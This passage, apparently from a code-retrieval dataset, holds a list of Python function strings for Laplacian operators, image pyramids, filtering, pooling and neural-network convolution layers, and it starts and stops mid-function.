len(gau_pyr)):\r\n expanded = gaussExpand(gau_pyr[i-1], upsmaple_kernel)\r\n if gau_pyr[i].shape != expanded.shape:\r\n x = expanded.shape[0] - gau_pyr[i].shape[0]\r\n y = expanded.shape[1] - gau_pyr[i].shape[1]\r\n expanded = expanded[x::, y::]\r\n diff_img = gau_pyr[i] - expanded\r\n else:\r\n diff_img = gau_pyr[i] - expanded\r\n lap_pyr.append(diff_img)\r\n\r\n lap_pyr.reverse()\r\n return lap_pyr", "def nodalLaplacian(self):\n if getattr(self, '_nodalLaplacian', None) is None:\n print('Warning: Laplacian has not been tested rigorously.')\n # The number of cell centers in each direction\n n = self.vnC\n # Compute divergence operator on faces\n if(self.dim == 1):\n D1 = sdiag(1./self.hx) * ddx(self.nCx)\n L = - D1.T*D1\n elif(self.dim == 2):\n D1 = sdiag(1./self.hx) * ddx(n[0])\n D2 = sdiag(1./self.hy) * ddx(n[1])\n L1 = sp.kron(speye(n[1]+1), - D1.T * D1)\n L2 = sp.kron(- D2.T * D2, speye(n[0]+1))\n L = L1 + L2\n elif(self.dim == 3):\n D1 = sdiag(1./self.hx) * ddx(n[0])\n D2 = sdiag(1./self.hy) * ddx(n[1])\n D3 = sdiag(1./self.hz) * ddx(n[2])\n L1 = kron3(speye(n[2]+1), speye(n[1]+1), - D1.T * D1)\n L2 = kron3(speye(n[2]+1), - D2.T * D2, speye(n[0]+1))\n L3 = kron3(- D3.T * D3, speye(n[1]+1), speye(n[0]+1))\n L = L1 + L2 + L3\n self._nodalLaplacian = L\n return self._nodalLaplacian", "def reconstructFromLaplacianPyramid(pyramid):\n \n nLevels = len(pyramid)\n out = pyramid[-1]\n if len(pyramid) == 1:\n return out\n\n useStack = False\n if pyramid[0].shape[0:2] == pyramid[-1].shape[0:2]:\n useStack = True\n\n dtp = out.dtype\n for i in range(nLevels-2,-1,-1):\n newSz = pyramid[i].shape[0:2]\n if useStack:\n up = out\n else:\n up = cv2.pyrUp(out,dstsize=(newSz[1],newSz[0]))\n if len(up.shape) < 3:\n up.shape += (1,)\n out = up + pyramid[i]\n out = out.astype(dtp)\n\n return out", "def lap2D(self, lat):\n lap = np.roll(lat, 1, 0) + np.roll(lat, -1, 0) + \\\n np.roll(lat, 1, 1) + np.roll(lat, -1, 1) - \\\n 4. * lat\n lap = 1./self.dx**2. 
* lap\n # print(lap[50][50])\n return(lap)", "def get_laplacian(adjacency: sparse.csr_matrix) -> sparse.csr_matrix:\n weights = adjacency.dot(np.ones(adjacency.shape[0]))\n return sparse.diags(weights) - adjacency", "def clConvolution(self, size, mask):", "def laplace_filter(F, M=None):\n\n if not M:\n M = np.ones_like(F)\n\n return 0.5 * (laplace_X(laplace_Y(F, M), M) +\n laplace_Y(laplace_X(F, M), M))", "def l_up(self, filters, l_in, l_c):\n l = tf.keras.layers.UpSampling2D(self.pooling_size)(l_in)\n l = tf.keras.layers.Conv2D(filters, 2, activation='relu', padding='same', kernel_initializer='he_normal')(l)\n l = tf.keras.layers.concatenate([l_c, l], axis=3)\n l = tf.keras.layers.Conv2D(filters, 3, activation='relu', padding='same', kernel_initializer='he_normal')(l)\n l = tf.keras.layers.Conv2D(filters, 3, activation='relu', padding='same', kernel_initializer='he_normal')(l)\n\n return l", "def laplacian(W, normalized=True):\n\n # Degree matrix.\n d = W.sum(dim=0)\n\n # Laplacian matrix.\n if not normalized:\n D = scipy.sparse.diags(d.A.squeeze(), 0)\n L = D - W\n else:\n # d += np.spacing(np.array(0, W.dtype))\n d = 1 / torch.sqrt(d)\n D = torch.diags(d.A.squeeze(), 0)\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\n L = I - D * W * D\n\n # assert np.abs(L - L.T).mean() < 1e-9\n assert type(L) is scipy.sparse.csr.csr_matrix\n return L", "def buildLaplacianPyramid(guassianPyramid):\n pyramid = []\n for i in range(len(guassianPyramid)-1):\n Gi = upsample(guassianPyramid[i+1])\n G = guassianPyramid[i]\n r, c = G.shape[:2]\n L = G - Gi[:r, :c]\n pyramid.append(L)\n\n pyramid.append(guassianPyramid[-1])\n return pyramid", "def apply_1d_filter(bfilter, timage):\n image_length = len(timage)\n ovrlay = int(bfilter.shape[0] / 2)\n tmp_array = np.zeros(image_length + 2 * ovrlay)\n tmp_array[ovrlay:-ovrlay] = timage\n res_array = np.zeros(image_length )\n for i in np.arange(image_length) + ovrlay:\n local_matrix = tmp_array[i - ovrlay:i + ovrlay + 1]\n res_array[i - ovrlay] = sum(local_matrix * bfilter)\n return res_array", "def laplacian_texture_smoothing(mesh, tex, nb_iter, dt):\n print(\" Smoothing texture\")\n lap, lap_b = compute_mesh_laplacian(mesh, lap_type=\"fem\")\n return laplacian_smoothing(tex, lap, lap_b, nb_iter, dt)", "def rescale_laplacian(L, lmax=None):\r\n if lmax is None:\r\n try:\r\n if sp.issparse(L):\r\n lmax = sp.linalg.eigsh(L, 1, which=\"LM\", return_eigenvectors=False)[0]\r\n else:\r\n n = L.shape[-1]\r\n lmax = linalg.eigh(L, eigvals_only=True, eigvals=[n - 2, n - 1])[-1]\r\n except ArpackNoConvergence:\r\n lmax = 2\r\n if sp.issparse(L):\r\n I = sp.eye(L.shape[-1], dtype=L.dtype)\r\n else:\r\n I = np.eye(L.shape[-1], dtype=L.dtype)\r\n L_scaled = (2.0 / lmax) * L - I\r\n return L_scaled", "def laplaceianExpand(lap_pyr: List[np.ndarray]) -> np.ndarray:\r\n gaker = cv2.getGaussianKernel(5, -1)\r\n upsmaple_kernel = gaker @ gaker.transpose()\r\n upsmaple_kernel *= 4\r\n lap_pyr.reverse()\r\n r_img = [lap_pyr[0]]\r\n for i in range(1, len(lap_pyr)):\r\n temp = gaussExpand(r_img[i - 1], upsmaple_kernel)\r\n if lap_pyr[i].shape != temp.shape:\r\n x = temp.shape[0] - lap_pyr[i].shape[0]\r\n y = temp.shape[1] - lap_pyr[i].shape[1]\r\n new_img = temp[x::, y::] + lap_pyr[i]\r\n else:\r\n new_img = temp + lap_pyr[i]\r\n r_img.append(new_img)\r\n lap_pyr.reverse()\r\n r_img.reverse()\r\n return r_img[0]", "def laplacian(G,nodelist=None,weight='weight'):\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\n \"laplacian() requires numpy: http://scipy.org/ 
\")\n # this isn't the most efficient way to do this...\n if G.is_multigraph():\n A=np.asarray(nx.to_numpy_matrix(G,nodelist=nodelist,weight=weight))\n I=np.identity(A.shape[0])\n D=I*np.sum(A,axis=1)\n L=D-A\n return L\n # Graph or DiGraph, this is faster than above \n if nodelist is None:\n nodelist=G.nodes()\n n=len(nodelist)\n index=dict( (n,i) for i,n in enumerate(nodelist) )\n L = np.zeros((n,n))\n for ui,u in enumerate(nodelist):\n totalwt=0.0\n for v,d in G[u].items():\n try:\n vi=index[v]\n except KeyError:\n continue\n wt=d.get(weight,1)\n L[ui,vi]= -wt\n totalwt+=wt\n L[ui,ui]= totalwt\n return L", "def laplacian2(A, laplacian_type='raw'):\r\n\r\n N = A.shape[0]\r\n # TODO: Raise exception if A is not square\r\n\r\n degrees = A.sum(1)\r\n # To deal with loops, must extract diagonal part of A\r\n diagw = np.diag(A)\r\n\r\n # w will consist of non-diagonal entries only\r\n ni2, nj2 = A.nonzero()\r\n w2 = A[ni2, nj2]\r\n ndind = (ni2 != nj2).nonzero() # Non-diagonal indices\r\n ni = ni2[ndind]\r\n nj = nj2[ndind]\r\n w = w2[ndind]\r\n\r\n di = np.arange(N) # diagonal indices\r\n\r\n if laplacian_type == 'raw':\r\n # non-normalized laplaciand L = D - A\r\n L = np.diag(degrees - diagw)\r\n L[ni, nj] = -w\r\n L = lil_matrix(L)\r\n elif laplacian_type == 'normalized':\r\n # TODO: Implement the normalized laplacian case\r\n # % normalized laplacian D^(-1/2)*(D-A)*D^(-1/2)\r\n # % diagonal entries\r\n # dL=(1-diagw./degrees); % will produce NaN for degrees==0 locations\r\n # dL(degrees==0)=0;% which will be fixed here\r\n # % nondiagonal entries\r\n # ndL=-w./vec( sqrt(degrees(ni).*degrees(nj)) );\r\n # L=sparse([ni;di],[nj;di],[ndL;dL],N,N);\r\n print(\"Not implemented\")\r\n else:\r\n # TODO: Raise an exception\r\n print(\"Don't know what to do\")\r\n\r\n return L", "def laplacian(ndim, shape, is_real=True):\n impr = np.zeros([3] * ndim)\n for dim in range(ndim):\n idx = tuple([slice(1, 2)] * dim +\n [slice(None)] +\n [slice(1, 2)] * (ndim - dim - 1))\n impr[idx] = np.array([-1.0,\n 0.0,\n -1.0]).reshape([-1 if i == dim else 1\n for i in range(ndim)])\n impr[([slice(1, 2)] * ndim)] = 2.0 * ndim\n return ir2tf(impr, shape, is_real=is_real), impr", "def pool_forward(A_prev, kernel_shape, stride=(1, 1), mode='max'):\n\n m = A_prev.shape[0]\n image_h = A_prev.shape[1]\n image_w = A_prev.shape[2]\n nc = A_prev.shape[3]\n filter_h = kernel_shape[0]\n filter_w = kernel_shape[1]\n s1 = stride[0]\n s2 = stride[1]\n n_dim1 = int((image_h - filter_h) / stride[0]) + 1\n n_dim2 = int((image_w - filter_w) / stride[1]) + 1\n pool = np.zeros((m, n_dim1, n_dim2, nc))\n new_images = A_prev.copy()\n\n for x in range(n_dim1):\n for y in range(n_dim2):\n mini_matrix = new_images[:, x * s1: x * s1 + filter_h,\n y * s2: y * s2 + filter_w, :]\n if mode == 'max':\n values = np.max(mini_matrix, axis=(1, 2))\n else:\n values = np.average(mini_matrix, axis=(1, 2))\n pool[:, x, y, :] = values\n return pool", "def lfilter(b, a, x, axis=-1, zi=None):\n a = np.atleast_1d(a)\n if len(a) == 1:\n # This path only supports types fdgFDGO to mirror _linear_filter below.\n # Any of b, a, x, or zi can set the dtype, but there is no default\n # casting of other types; instead a NotImplementedError is raised.\n b = np.asarray(b)\n a = np.asarray(a)\n if b.ndim != 1 and a.ndim != 1:\n raise ValueError('object of too small depth for desired array')\n x = np.asarray(x)\n inputs = [b, a, x]\n if zi is not None:\n # _linear_filter does not broadcast zi, but does do expansion of\n # singleton dims.\n zi = np.asarray(zi)\n if zi.ndim 
!= x.ndim:\n raise ValueError('object of too small depth for desired array')\n expected_shape = list(x.shape)\n expected_shape[axis] = b.shape[0] - 1\n expected_shape = tuple(expected_shape)\n # check the trivial case where zi is the right shape first\n if zi.shape != expected_shape:\n strides = zi.ndim * [None]\n if axis < 0:\n axis += zi.ndim\n for k in range(zi.ndim):\n if k == axis and zi.shape[k] == expected_shape[k]:\n strides[k] = zi.strides[k]\n elif k != axis and zi.shape[k] == expected_shape[k]:\n strides[k] = zi.strides[k]\n elif k != axis and zi.shape[k] == 1:\n strides[k] = 0\n else:\n raise ValueError('Unexpected shape for zi: expected '\n '%s, found %s.' %\n (expected_shape, zi.shape))\n zi = np.lib.stride_tricks.as_strided(zi, expected_shape,\n strides)\n inputs.append(zi)\n dtype = np.result_type(*inputs)\n\n if dtype.char not in 'fdgFDGO':\n raise NotImplementedError(\"input type '%s' not supported\" % dtype)\n\n b = np.array(b, dtype=dtype)\n a = np.array(a, dtype=dtype, copy=False)\n b /= a[0]\n x = np.array(x, dtype=dtype, copy=False)\n\n out_full = np.apply_along_axis(lambda y: np.convolve(b, y), axis, x)\n ind = out_full.ndim * [slice(None)]\n if zi is not None:\n ind[axis] = slice(zi.shape[axis])\n out_full[ind] += zi\n\n ind[axis] = slice(out_full.shape[axis] - len(b) + 1)\n out = out_full[ind]\n\n if zi is None:\n return out\n else:\n ind[axis] = slice(out_full.shape[axis] - len(b) + 1, None)\n zf = out_full[ind]\n return out, zf\n else:\n if zi is None:\n return sigtools._linear_filter(b, a, x, axis)\n else:\n return sigtools._linear_filter(b, a, x, axis, zi)", "def lowPassFilter(img, window=30):\n gray = grayscale(img)\n\tdft = cv2.dft(np.float32(gray), flags = cv2.DFT_COMPLEX_OUTPUT)\n\tdft_shift = np.fft.fftshift(dft)\n\trows, cols = gray.shape\n\tcrow, ccol = rows/2, cols/2\n\tmask = np.zeros((rows, cols, 2), np.uint8)\n\tmask[crow-window:crow+window, ccol-window:ccol+window] = 1\n\tfshift = dft_shift*mask\n\tf_ishift = np.fft.ifftshift(fshift)\n\timg_back = cv2.idft(f_ishift)\n\timg_back = cv2.magnitude(img_back[:,:,0], img_back[:,:,1])\n\treturn img_back", "def laplacian_mesh_smoothing(mesh, nb_iter, dt, volume_preservation=False):\n print(\" Smoothing mesh\")\n lap, lap_b = compute_mesh_laplacian(mesh, lap_type=\"fem\")\n smoothed_vert = laplacian_smoothing(mesh.vertices, lap, lap_b, nb_iter, dt)\n if volume_preservation:\n vol_ini = mesh.volume\n vol_new = trimesh.triangles.mass_properties(\n smoothed_vert[mesh.faces], skip_inertia=True\n )[\"volume\"]\n # scale by volume ratio\n smoothed_vert *= (vol_ini / vol_new) ** (1.0 / 3.0)\n return trimesh.Trimesh(\n faces=mesh.faces, vertices=smoothed_vert, metadata=mesh.metadata, process=False\n )", "def laplacian_tf(P, Q):\r\n\r\n # Create transfer function H.\r\n H = np.zeros((P, Q), dtype=np.complex128)\r\n # Create laplacian transfer function.\r\n laplacian = np.array([[0, -1, 0], \r\n [-1, 4, -1], \r\n [0, -1, 0]], dtype=np.int64)\r\n # Center laplacian kernel on P x Q rectangle.\r\n H[int(np.floor(P/2))-1: int(np.floor(P/2))+2, int(np.floor(Q/2))-1: int(np.floor(Q/2))+2] = laplacian\r\n # Calculate laplacian transfer function.\r\n H = np.fft.fftshift(np.fft.fft2(H))\r\n return H", "def smooth_pinv(B, L):\n L = diag(L)\n inv = pinv(concatenate((B, L)))\n return inv[:, :len(B)]", "def PrewittGradient(anImage):\n XKernel = [\n [-1,0,1],\n [-1,0,1],\n [-1,0,1]\n ]\n YKernel = [\n [-1,-1,-1],\n [0,0,0],\n [1,1,1]\n ]\n return ApplyGradientKernels(anImage, XKernel, YKernel)", "def laplacian(images, n_down=4):\n 
lapls = []\n\n for i in range(n_down):\n n = F.interpolate(images, scale_factor=0.5, mode='bilinear',\n align_corners=True)\n lapls.append(images -\n F.interpolate(n, size=images.shape[-2:], mode='bilinear',\n align_corners=True))\n images = n\n\n lapls.append(images)\n return lapls", "def make_vector_laplace(bcs: Boundaries) -> OperatorType:\n assert isinstance(bcs.grid, CylindricalSymGrid)\n bcs.check_value_rank(1)\n\n laplace_r = make_laplace(bcs.extract_component(0))\n laplace_z = make_laplace(bcs.extract_component(1))\n laplace_phi = make_laplace(bcs.extract_component(2))\n\n @jit_allocate_out(out_shape=(3,) + bcs.grid.shape)\n def vector_laplace(arr, out=None):\n \"\"\"apply gradient operator to array `arr`\"\"\"\n laplace_r(arr[0], out=out[0])\n laplace_z(arr[1], out=out[1])\n laplace_phi(arr[2], out=out[2])\n return out\n\n return vector_laplace # type: ignore", "def solve_laplace_equation(\n grid: GridBase, bc: \"BoundariesData\", label: str = \"Solution to Laplace's equation\"\n) -> ScalarField:\n rhs = ScalarField(grid, data=0)\n return solve_poisson_equation(rhs, bc=bc, label=label)", "def pool_forward(A_prev, kernel_shape, stride=(1, 1), mode='max'):\n sh, sw = stride\n kh, kw = kernel_shape\n m, h_prev, w_prev, c_prev = A_prev.shape\n if mode == 'max':\n pool = np.max\n else:\n pool = np.average\n pixy = (((h_prev - kh) // sh) + 1)\n pixx = (((w_prev - kw) // sw) + 1)\n cvv_img = np.zeros((m, pixy, pixx, c_prev))\n for i in range(pixy):\n for j in range(pixx):\n cvv_img[:, i, j, :] = pool(A_prev[:, (i * sh): (i * sh) + kh,\n (j * sw): (j * sw) + kw],\n axis=(1, 2))\n return cvv_img", "def pooling_layer(self, img):\n img_w, img_h, img_c = img.shape\n output_dim = int((img_w - self._kernel_size) / self._kernel_size) + 1\n output = np.zeros((output_dim, output_dim, img_c))\n\n for c in range(img_c):\n in_x = out_x = 0\n while in_x + self._kernel_size <= img_w:\n in_y = out_y = 0\n while in_y + self._kernel_size <= img_h:\n output[out_x, out_y, c] = np.max(img[in_x:in_x + self._kernel_size, in_y:in_y + self._kernel_size, c])\n in_y += self._kernel_size\n out_y += 1\n in_x += self._kernel_size\n out_x += 1\n return output", "def normalized_laplacian(degree_vector, weight_matrix, length):\n holders = np.zeros((length, 1))\n holders[:, 0] = 1 / degree_vector\n\n return np.eye(length) - holders * weight_matrix", "def l_conv(self, filters, l_in, dropout=None):\n l = tf.keras.layers.Conv2D(filters, 3, activation='relu', padding='same', kernel_initializer='he_normal')(l_in)\n l = tf.keras.layers.Conv2D(filters, 3, activation='relu', padding='same', kernel_initializer='he_normal')(l)\n if dropout:\n l = tf.keras.layers.Dropout(dropout)(l)\n return l, tf.keras.layers.MaxPool2D(pool_size=self.pooling_size)(l)", "def lowpass(data,filterSize=None):\n\n def convolve(signal,kernel):\n pad=np.ones(len(kernel)/2)\n signal=np.concatenate((pad*signal[0],signal,pad*signal[-1]))\n signal=np.convolve(signal,kernel,mode='same')\n signal=signal[len(pad):-len(pad)]\n return signal\n\n def kernel_gaussian(size=100, sigma=None, forwardOnly=False):\n if sigma is None:\n sigma=size/10\n size=int(size)\n points=np.exp(-np.power(np.arange(size)-size/2,2)/(2*np.power(sigma,2)))\n if forwardOnly:\n points[:int(len(points)/2)]=0\n return points/sum(points)\n\n if filterSize is None:\n filterSize=len(data)/10\n kernel=kernel_gaussian(size=filterSize)\n data=convolve(data,kernel) # do the convolution with padded edges\n return data", "def solve_inverse_laplacian(self, array_in, zero_mode_val):\r\n # Initialise 
output array, u\r\n array_out = np.zeros((self.N, self.N), dtype = complex)\r\n N = self.N\r\n\r\n for k1 in range(-N//2, N//2):\r\n for k2 in range(-N//2, N//2):\r\n if k1 == k2 and k1 == 0: # Set zero-th mode, i.e. constant of integration\r\n array_out[k1 + N//2, k2 + N//2] = zero_mode_val\r\n else: # All other modes are found by inverting the spectral differentiation factor\r\n laplace_op = -(k1**2 + k2**2)*self.factor**2\r\n array_out[k1 + N//2, k2 + N//2] = array_in[k1 + N//2, k2 + N//2]/laplace_op\r\n\r\n return array_out", "def calculate_laplace_coeff(alpha, j, s):\n return integrate.quad(lambda psi, alpha, j, s: np.cos(j*psi)/(1-2*alpha*np.cos(psi)+alpha**2)**s,\n 0, 2*np.pi, args=(alpha, j, s,))[0]/np.pi", "def forward(self, query, key, value, mask):\n # linear -> GLU -> lightconv -> linear\n x = query\n B, T, C = x.size()\n H = self.wshare\n\n # first liner layer\n x = self.linear1(x)\n\n # GLU activation\n x = self.act(x)\n\n # convolution along frequency axis\n weight_f = F.softmax(self.weight_f, dim=-1)\n weight_f = F.dropout(weight_f, self.dropout_rate, training=self.training)\n weight_new = torch.zeros(\n B * T, 1, self.kernel_size, device=x.device, dtype=x.dtype\n ).copy_(weight_f)\n xf = F.conv1d(\n x.view(1, B * T, C), weight_new, padding=self.padding_size, groups=B * T\n ).view(B, T, C)\n\n # lightconv\n x = x.transpose(1, 2).contiguous().view(-1, H, T) # B x C x T\n weight = F.dropout(self.weight, self.dropout_rate, training=self.training)\n if self.use_kernel_mask:\n self.kernel_mask = self.kernel_mask.to(x.device)\n weight = weight.masked_fill(self.kernel_mask == 0.0, float(\"-inf\"))\n weight = F.softmax(weight, dim=-1)\n x = F.conv1d(x, weight, padding=self.padding_size, groups=self.wshare).view(\n B, C, T\n )\n if self.use_bias:\n x = x + self.bias.view(1, -1, 1)\n x = x.transpose(1, 2) # B x T x C\n x = torch.cat((x, xf), -1) # B x T x Cx2\n\n if mask is not None and not self.use_kernel_mask:\n mask = mask.transpose(-1, -2)\n x = x.masked_fill(mask == 0, 0.0)\n\n # second linear layer\n x = self.linear2(x)\n return x", "def lanczos_resampling(arr, target_r, target_c):\n origin_r = arr.shape[0]\n origin_c = arr.shape[1]\n s_r, s_c = get_sampling_scale(origin_r, origin_c, target_r, target_c)\n # Padding 3 to outside of arr.\n arr_padded = np.pad(arr, ((2, 3), (2, 3), (0, 0)), 'edge')\n output = np.ndarray([target_r, target_c, 3], dtype=np.uint8)\n\n def lanczos_filter(x):\n if x == 0:\n return 1\n elif -3 <= x < 3:\n return (3 * np.sin(np.pi * x) * np.sin(np.pi * x / 3)) / (np.pi * np.pi * x * x)\n else:\n return 0\n\n # Populate pixel in output\n for r in range(target_r):\n for c in range(target_c):\n rf, cf = s_r * r, s_c * c\n rp, cp = math.floor(rf), math.floor(cf)\n # Grab 36 pixels.\n region = arr_padded[rp:(rp + 6), cp:(cp + 6), :]\n coefs = np.ndarray((6, 6), dtype=float)\n for r_t in range(-2, 4):\n for c_t in range(-2, 4):\n coefs[r_t + 2, c_t + 2] = lanczos_filter(np.sqrt((rp + r_t - rf) ** 2 + (cp + c_t - cf) ** 2))\n coefs /= np.sum(coefs)\n this_color = np.zeros((3, ), dtype=float)\n for r_t in range(6):\n for c_t in range(6):\n this_color += region[r_t, c_t, :] * coefs[r_t, c_t]\n this_color = np.minimum(np.maximum(this_color, 0), 255)\n output[r, c, :] = this_color\n print(\"\\rPlease Wait: %d / %d\" % (r, target_r), end='')\n return output", "def low_pass(self, x, kernel):\n\n ############################\n ### TODO: YOUR CODE HERE ###\n\n # HANDLE NON-SQUARE KERNELS!!!\n padX = kernel.shape[2]//2\n padY = kernel.shape[3]//2\n filtered_image = 
F.conv2d(x, kernel, padding=(padX, padY), groups=self.n_channels)\n\n # raise NotImplementedError('`low_pass` function in `models.py` needs to '\n # + 'be implemented')\n\n ### END OF STUDENT CODE ####\n ############################\n\n return filtered_image", "def laplacian(W, normalized=False):\r\n # Degree matrix.\r\n d = W.sum(axis=0)\r\n # Laplacian matrix.\r\n if not normalized:\r\n D = scipy.sparse.diags(d.A.squeeze(), 0)\r\n L = D - W\r\n else:\r\n # d += np.spacing(np.array(0, W.dtype))\r\n d = 1 / np.sqrt(d)\r\n D = scipy.sparse.diags(d.A.squeeze(), 0)\r\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\r\n L = I - D * W * D\r\n\r\n # assert np.abs(L - L.T).mean() < 1e-9\r\n assert type(L) is scipy.sparse.csr.csr_matrix\r\n return L", "def laplacian_(self, grid, i, j):\n l1 = grid[(i+1+self.N) % self.N][j] + grid[(i-1+self.N) % self.N][j]\n l2 = grid[i][(j+1+self.N) % self.N] + grid[i][(j-1+self.N) % self.N]\n l3 = -4*grid[i][j]\n return (l1 + l2 + l3)/self.dx**2", "def _reduce_rows(im, filter_vec):\n im_small = convolve(im, filter_vec)\n return im_small[::SIZE_F]", "def warp_tensor(tensor):\n\n #tf.config.run_functions_eagerly(True)\n\n num_hole_rate = 4 / (128*128) # percent of selected pixels in downsample imagee\n\n tensor = tf.expand_dims(tensor, 0)\n if tensor.shape.rank == 5:\n # 3D blurring\n filters = tf.ones([3,3,3], dtype=tf.float32) / 27\n filters = filters[..., tf.newaxis, tf.newaxis]\n tensor = tf.nn.conv3d(tensor, filters, [1,1,1,1,1], \"SAME\")\n\n # make hole\n uniform_random = tf.random.uniform([tensor.shape[1]*tensor.shape[2]*tensor.shape[3]], 0, 1.0)\n uniform_random = tf.reshape(uniform_random, tensor.shape)\n mask_matrix = tf.where(uniform_random < num_hole_rate, tf.ones_like(tensor), tf.zeros_like(tensor)) \n \n # dilate holes \n filters = tf.ones([4,4,4], dtype=tf.float32) \n filters = filters[..., tf.newaxis, tf.newaxis]\n mask_matrix = tf.nn.conv3d(mask_matrix, filters, [1,1,1,1,1], \"SAME\")\n \n # apply mask -- make the \"holes\" the mean value of the image \n mean = tf.math.reduce_mean(tensor)\n tensor = tf.where(mask_matrix > 0, tf.ones_like(tensor)*mean, tensor) \n else:\n # 2D blurring\n filters = tf.ones([3,3], dtype=tf.float32) / 9\n filters = filters[..., tf.newaxis, tf.newaxis]\n tensor = tf.nn.conv2d(tensor, filters, [1,1,1,1], \"SAME\")\n\n # make hole\n uniform_random = tf.random.uniform([tensor.shape[1]*tensor.shape[2]], 0, 1.0)\n uniform_random = tf.reshape(uniform_random, tensor.shape)\n mask_matrix = tf.where(uniform_random < num_hole_rate, tf.ones_like(tensor), tf.zeros_like(tensor)) \n \n # dilate holes \n filters = tf.ones([4,4], dtype=tf.float32) \n filters = filters[..., tf.newaxis, tf.newaxis]\n mask_matrix = tf.nn.conv2d(mask_matrix, filters, [1,1,1,1], \"SAME\")\n \n # apply mask -- make the \"holes\" the mean value of the image \n mean = tf.math.reduce_mean(tensor)\n tensor = tf.where(mask_matrix > 0, tf.ones_like(tensor)*mean, tensor) \n\n\n return tf.squeeze(tensor, [0])", "def one_dim_sparse_laplacian(m: int):\n return sp.diags([1.0, -2.0, 1.0], [-1, 0, 1], dtype='float64', shape=(m, m), format='lil')", "def inject_latent(self, layer, inputs, target, action):\n hparams = self.hparams\n final_filters = common_layers.shape_list(layer)[-1]\n filters = hparams.hidden_size\n kernel = (4, 4)\n layer_shape = common_layers.shape_list(layer)\n activation_fn = common_layers.belu\n if hparams.activation_fn == \"relu\":\n activation_fn = tf.nn.relu\n\n def add_bits(layer, bits):\n z_mul = tfl.dense(bits, final_filters, 
name=\"unbottleneck_mul\")\n if not hparams.complex_addn:\n return layer + z_mul\n layer *= tf.nn.sigmoid(z_mul)\n z_add = tfl.dense(bits, final_filters, name=\"unbottleneck_add\")\n layer += z_add\n return layer\n\n if not self.is_training:\n if hparams.full_latent_tower:\n rand = tf.random_uniform(layer_shape[:-1] + [hparams.bottleneck_bits])\n bits = 2.0 * tf.to_float(tf.less(0.5, rand)) - 1.0\n else:\n bits, _ = discretization.predict_bits_with_lstm(\n layer, hparams.latent_predictor_state_size, hparams.bottleneck_bits,\n temperature=hparams.latent_predictor_temperature)\n bits = tf.expand_dims(tf.expand_dims(bits, axis=1), axis=2)\n return add_bits(layer, bits), 0.0\n\n # Embed.\n frames = tf.concat(inputs + [target], axis=-1)\n x = tfl.dense(\n frames, filters, name=\"latent_embed\",\n bias_initializer=tf.random_normal_initializer(stddev=0.01))\n x = common_attention.add_timing_signal_nd(x)\n\n # Add embedded action if present.\n if action is not None:\n x = common_video.inject_additional_input(\n x, action, \"action_enc_latent\", hparams.action_injection)\n\n if hparams.full_latent_tower:\n for i in range(hparams.num_compress_steps):\n with tf.variable_scope(\"latent_downstride%d\" % i):\n x = common_layers.make_even_size(x)\n if i < hparams.filter_double_steps:\n filters *= 2\n x = common_attention.add_timing_signal_nd(x)\n x = tfl.conv2d(x, filters, kernel,\n activation=activation_fn,\n strides=(2, 2), padding=\"SAME\")\n x = common_layers.layer_norm(x)\n else:\n x = common_layers.double_discriminator(x)\n x = tf.expand_dims(tf.expand_dims(x, axis=1), axis=1)\n\n bits, bits_clean = discretization.tanh_discrete_bottleneck(\n x, hparams.bottleneck_bits, hparams.bottleneck_noise,\n hparams.discretize_warmup_steps, hparams.mode)\n if not hparams.full_latent_tower:\n _, pred_loss = discretization.predict_bits_with_lstm(\n layer, hparams.latent_predictor_state_size, hparams.bottleneck_bits,\n target_bits=bits_clean)\n # Mix bits from latent with predicted bits on forward pass as a noise.\n if hparams.latent_rnn_max_sampling > 0.0:\n with tf.variable_scope(tf.get_variable_scope(), reuse=True):\n bits_pred, _ = discretization.predict_bits_with_lstm(\n layer, hparams.latent_predictor_state_size,\n hparams.bottleneck_bits,\n temperature=hparams.latent_predictor_temperature)\n bits_pred = tf.expand_dims(tf.expand_dims(bits_pred, axis=1), axis=2)\n # Be bits_pred on the forward pass but bits on the backward one.\n bits_pred = bits_clean + tf.stop_gradient(bits_pred - bits_clean)\n # Select which bits to take from pred sampling with bit_p probability.\n which_bit = tf.random_uniform(common_layers.shape_list(bits))\n bit_p = common_layers.inverse_lin_decay(hparams.latent_rnn_warmup_steps)\n bit_p *= hparams.latent_rnn_max_sampling\n bits = tf.where(which_bit < bit_p, bits_pred, bits)\n\n res = add_bits(layer, bits)\n # During training, sometimes skip the latent to help action-conditioning.\n res_p = common_layers.inverse_lin_decay(hparams.latent_rnn_warmup_steps / 2)\n res_p *= hparams.latent_use_max_probability\n res_rand = tf.random_uniform([layer_shape[0]])\n res = tf.where(res_rand < res_p, res, layer)\n return res, pred_loss", "def __call__(\n self,\n image: np.ndarray,\n f_keep_pixels: float = 0,\n f_keep_colored_pixels: float = 0,\n ) -> np.ndarray:\n # Store shape\n h, w, c = image.shape\n\n img_np = image\n\n # Apply transformations\n image: torch.Tensor = self.transform(Image.fromarray(image))\n image = image.to(self.device)\n\n # Copy the numpy array because it's not writeable 
otherwise\n # Bring into shape [1,1,h,w]\n image.unsqueeze_(0)\n\n # Inference\n result = self.model.networks.g_b_to_a.forward(image).detach()\n\n # From [-1,1] to [0,256]\n result = tensor2im(result, to_rgb=False)\n\n # Resize to the size the input image has\n result = cv2.resize(result, dsize=(w, h), interpolation=cv2.INTER_LINEAR)\n\n if f_keep_pixels > 0:\n grey_img = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)\n colored_pxls = f_keep_pixels * np.ones((h, w))\n\n result = (1 - f_keep_pixels) * result + f_keep_pixels * grey_img\n\n if f_keep_colored_pixels > 0:\n grey_img = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)\n colored_pxls = f_keep_colored_pixels * np.ones((h, w))\n colored_pxls[img_np[:, :, 0] == img_np[:, :, 1]] = 0\n\n result = (\n np.ones_like(colored_pxls) - colored_pxls\n ) * result + colored_pxls * grey_img\n\n return result.astype(np.uint8)", "def construct_2d_filt(lo: torch.Tensor, hi: torch.Tensor) -> torch.Tensor:\n ll = _outer(lo, lo)\n lh = _outer(hi, lo)\n hl = _outer(lo, hi)\n hh = _outer(hi, hi)\n filt = torch.stack([ll, lh, hl, hh], 0)\n filt = filt.unsqueeze(1)\n return filt", "def laplacian(self, point):\n n_vertices, n_faces = point.shape[-2], self.faces.shape[0]\n vertex_0, vertex_1, vertex_2 = self._vertices(point)\n len_edge_12 = gs.linalg.norm((vertex_1 - vertex_2), axis=-1)\n len_edge_02 = 